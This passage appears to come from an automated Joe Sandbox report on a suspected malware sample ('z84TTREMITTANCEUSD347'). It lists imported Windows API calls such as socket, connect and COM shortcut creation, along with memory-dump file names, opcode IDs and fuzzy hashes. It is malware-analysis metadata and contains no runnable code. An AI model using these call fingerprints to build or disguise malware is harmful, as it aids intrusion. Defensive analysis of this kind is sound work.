• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
                                                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • BeginPath.GDI32(?), ref: 0044723D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                      • String ID:
                                                                      • API String ID: 2338827641-0
                                                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                      • String ID:
                                                                      • API String ID: 4023252218-0
                                                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 1489400265-0
                                                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                      APIs
                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                      • DestroyWindow.USER32(?), ref: 00455728
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1042038666-0
                                                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 0041780F
                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                      • __getptd.LIBCMT ref: 00417826
                                                                      • __amsg_exit.LIBCMT ref: 00417834
                                                                      • __lock.LIBCMT ref: 00417844
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                      • String ID:
                                                                      • API String ID: 938513278-0
                                                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                      APIs
                                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                      • String ID:
                                                                      • API String ID: 2403457894-0
                                                                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                      APIs
                                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                      • String ID:
                                                                      • API String ID: 4247068974-0
                                                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$U$\
                                                                      • API String ID: 0-3705770531
                                                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                      APIs
                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
